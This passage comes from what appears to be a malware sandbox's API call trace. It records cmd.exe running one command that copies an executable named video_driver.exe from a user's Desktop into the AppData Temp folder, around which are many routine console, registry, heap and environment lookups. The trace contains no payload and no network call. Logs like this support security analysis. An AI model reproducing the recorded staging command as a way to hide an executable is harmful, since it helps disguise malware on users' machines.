lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0038.333] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.333] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.334] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32fb2c | out: phkResult=0x32fb2c*=0x0) returned 0x2 [0038.334] VirtualQuery (in: lpAddress=0x32fb63, lpBuffer=0x32fafc, dwLength=0x1c | out: lpBuffer=0x32fafc*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0038.334] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32fafc, dwLength=0x1c | out: lpBuffer=0x32fafc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0038.334] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32fafc, dwLength=0x1c | out: lpBuffer=0x32fafc*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0038.334] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32fafc, dwLength=0x1c | out: lpBuffer=0x32fafc*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0038.334] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32fafc, dwLength=0x1c | out: lpBuffer=0x32fafc*(BaseAddress=0x330000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0038.334] GetConsoleOutputCP () returned 0x1b5 [0038.334] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a244260 | out: lpCPInfo=0x4a244260) returned 1 [0038.334] SetConsoleCtrlHandler (HandlerRoutine=0x4a23e72a, Add=1) returned 1 [0038.334] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.334] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0038.335] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.335] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2441ac | out: lpMode=0x4a2441ac) returned 1 [0038.335] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.335] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0038.335] _get_osfhandle (_FileHandle=0) returned 0x3 [0038.335] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2441b0 | out: lpMode=0x4a2441b0) returned 1 [0038.337] _get_osfhandle (_FileHandle=0) returned 0x3 [0038.337] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0038.338] GetEnvironmentStringsW () returned 0x342180* [0038.338] GetProcessHeap () returned 0x330000 [0038.338] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xaca) returned 0x342c58 [0038.338] FreeEnvironmentStringsW (penv=0x342180) returned 1 [0038.338] GetProcessHeap () returned 0x330000 [0038.338] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4) returned 0x341870 [0038.338] GetEnvironmentStringsW () returned 0x342180* [0038.338] GetProcessHeap () returned 0x330000 [0038.338] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xaca) returned 0x343730 [0038.338] FreeEnvironmentStringsW (penv=0x342180) returned 1 [0038.338] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ea9c | out: phkResult=0x32ea9c*=0x68) returned 0x0 [0038.339] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x0, lpData=0x32eaa8*=0x0, lpcbData=0x32eaa0*=0x1000) returned 0x2 [0038.339] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x1, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.339] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x0, lpData=0x32eaa8*=0x1, lpcbData=0x32eaa0*=0x1000) returned 0x2 [0038.339] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x0, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.339] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x40, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.339] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x40, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.339] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x0, lpData=0x32eaa8*=0x40, lpcbData=0x32eaa0*=0x1000) returned 0x2 [0038.339] RegCloseKey (hKey=0x68) returned 0x0 [0038.339] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32ea9c | out: phkResult=0x32ea9c*=0x68) returned 0x0 [0038.340] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x0, lpData=0x32eaa8*=0x40, lpcbData=0x32eaa0*=0x1000) returned 0x2 [0038.340] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x1, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.340] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x0, lpData=0x32eaa8*=0x1, lpcbData=0x32eaa0*=0x1000) returned 0x2 [0038.340] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x0, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.340] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x9, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.340] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x4, lpData=0x32eaa8*=0x9, lpcbData=0x32eaa0*=0x4) returned 0x0 [0038.340] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32eaa4, lpData=0x32eaa8, lpcbData=0x32eaa0*=0x1000 | out: lpType=0x32eaa4*=0x0, lpData=0x32eaa8*=0x9, lpcbData=0x32eaa0*=0x1000) returned 0x2 [0038.340] RegCloseKey (hKey=0x68) returned 0x0 [0038.340] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b5f [0038.340] srand (_Seed=0x5eb34b5f) [0038.340] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe\" C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe" [0038.340] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe\" C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\video_driver.exe" [0038.341] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a245260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.341] GetProcessHeap () returned 0x330000 [0038.341] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x210) returned 0x342180 [0038.341] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x342188, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0038.342] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a250640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0038.342] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a250640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.342] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a250640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0038.342] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0038.342] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0038.342] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0038.342] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0038.342] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0038.342] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0038.342] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0038.343] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0038.343] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0038.343] GetProcessHeap () returned 0x330000 [0038.343] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x342c58 | out: hHeap=0x330000) returned 1 [0038.343] GetEnvironmentStringsW () returned 0x342398* [0038.343] GetProcessHeap () returned 0x330000 [0038.343] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae2) returned 0x344cf8 [0038.343] FreeEnvironmentStringsW (penv=0x342398) returned 1 [0038.343] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a250640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.343] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a250640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0038.343] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0038.343] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0038.343] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0038.343] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0038.343] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0038.343] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0038.343] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0038.343] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0038.343] GetProcessHeap () returned 0x330000 [0038.343] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x54) returned 0x3457e8 [0038.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f868 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.344] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f868, lpFilePart=0x32f864 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f864*="Desktop") returned 0x25 [0038.344] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0038.344] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f5e4 | out: lpFindFileData=0x32f5e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x342000 [0038.344] FindClose (in: hFindFile=0x342000 | out: hFindFile=0x342000) returned 1 [0038.344] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f5e4 | out: lpFindFileData=0x32f5e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x342000 [0038.344] FindClose (in: hFindFile=0x342000 | out: hFindFile=0x342000) returned 1 [0038.344] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0038.344] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f5e4 | out: lpFindFileData=0x32f5e4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x342000 [0038.344] FindClose (in: hFindFile=0x342000 | out: hFindFile=0x342000) returned 1 [0038.345] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0038.345] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0038.345] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0038.345] GetProcessHeap () returned 0x330000 [0038.345] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x344cf8 | out: hHeap=0x330000) returned 1 [0038.345] GetEnvironmentStringsW () returned 0x344208* [0038.345] GetProcessHeap () returned 0x330000 [0038.345] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb36) returned 0x345848 [0038.345] FreeEnvironmentStringsW (penv=0x344208) returned 1 [0038.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a245260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.345] GetProcessHeap () returned 0x330000 [0038.345] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3457e8 | out: hHeap=0x330000) returned 1 [0038.345] GetProcessHeap () returned 0x330000 [0038.345] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x400e) returned 0x346388 [0038.346] GetProcessHeap () returned 0x330000 [0038.346] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xfa) returned 0x330ff0 [0038.346] GetProcessHeap () returned 0x330000 [0038.346] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x346388 | out: hHeap=0x330000) returned 1 [0038.346] GetConsoleOutputCP () returned 0x1b5 [0038.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a244260 | out: lpCPInfo=0x4a244260) returned 1 [0038.346] GetUserDefaultLCID () returned 0x409 [0038.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a244950, cchData=8 | out: lpLCData=":") returned 2 [0038.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f9a8, cchData=128 | out: lpLCData="0") returned 2 [0038.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f9a8, cchData=128 | out: lpLCData="0") returned 2 [0038.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f9a8, cchData=128 | out: lpLCData="1") returned 2 [0038.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a244940, cchData=8 | out: lpLCData="/") returned 2 [0038.347] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a244d80, cchData=32 | out: lpLCData="Mon") returned 4 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a244d40, cchData=32 | out: lpLCData="Tue") returned 4 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a244d00, cchData=32 | out: lpLCData="Wed") returned 4 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a244cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a244c80, cchData=32 | out: lpLCData="Fri") returned 4 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a244c40, cchData=32 | out: lpLCData="Sat") returned 4 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a244c00, cchData=32 | out: lpLCData="Sun") returned 4 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a244930, cchData=8 | out: lpLCData=".") returned 2 [0038.348] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a244920, cchData=8 | out: lpLCData=",") returned 2 [0038.348] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0038.349] GetProcessHeap () returned 0x330000 [0038.349] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x20c) returned 0x342ed8 [0038.349] GetConsoleTitleW (in: lpConsoleTitle=0x342ed8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0038.350] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0038.350] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0038.350] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0038.350] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0038.351] GetProcessHeap () returned 0x330000 [0038.351] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x400a) returned 0x346388 [0038.351] GetProcessHeap () returned 0x330000 [0038.351] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x346388 | out: hHeap=0x330000) returned 1 [0038.351] _wcsicmp (_String1="copy", _String2=")") returned 58 [0038.352] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0038.352] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0038.352] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0038.352] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0038.352] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0038.352] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0038.352] GetProcessHeap () returned 0x330000 [0038.352] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x58) returned 0x3310f8 [0038.352] GetProcessHeap () returned 0x330000 [0038.352] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x12) returned 0x331158 [0038.355] GetProcessHeap () returned 0x330000 [0038.355] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xee) returned 0x331178 [0038.356] GetConsoleTitleW (in: lpConsoleTitle=0x32f6a0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0038.357] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0038.357] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0038.357] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0038.357] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0038.357] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0038.357] GetProcessHeap () returned 0x330000 [0038.357] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x1d4) returned 0x3430f0 [0038.361] GetProcessHeap () returned 0x330000 [0038.361] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x3430f0, Size=0xf0) returned 0x3430f0 [0038.361] GetProcessHeap () returned 0x330000 [0038.361] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x3430f0) returned 0xf0 [0038.365] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.365] GetProcessHeap () returned 0x330000 [0038.365] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xf8) returned 0x3431e8 [0038.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a245260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0038.365] GetProcessHeap () returned 0x330000 [0038.365] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x2c) returned 0x331270 [0038.365] GetProcessHeap () returned 0x330000 [0038.365] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x2c) returned 0x3432e8 [0038.365] GetProcessHeap () returned 0x330000 [0038.365] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x18) returned 0x3312a8 [0038.365] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0038.365] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0038.365] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0038.365] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0038.366] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0038.367] GetProcessHeap () returned 0x330000 [0038.367] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3312a8 | out: hHeap=0x330000) returned 1 [0038.367] GetProcessHeap () returned 0x330000 [0038.367] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x18) returned 0x3312a8 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0038.367] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0038.367] _wcsnicmp (_String1="COPYCMD", 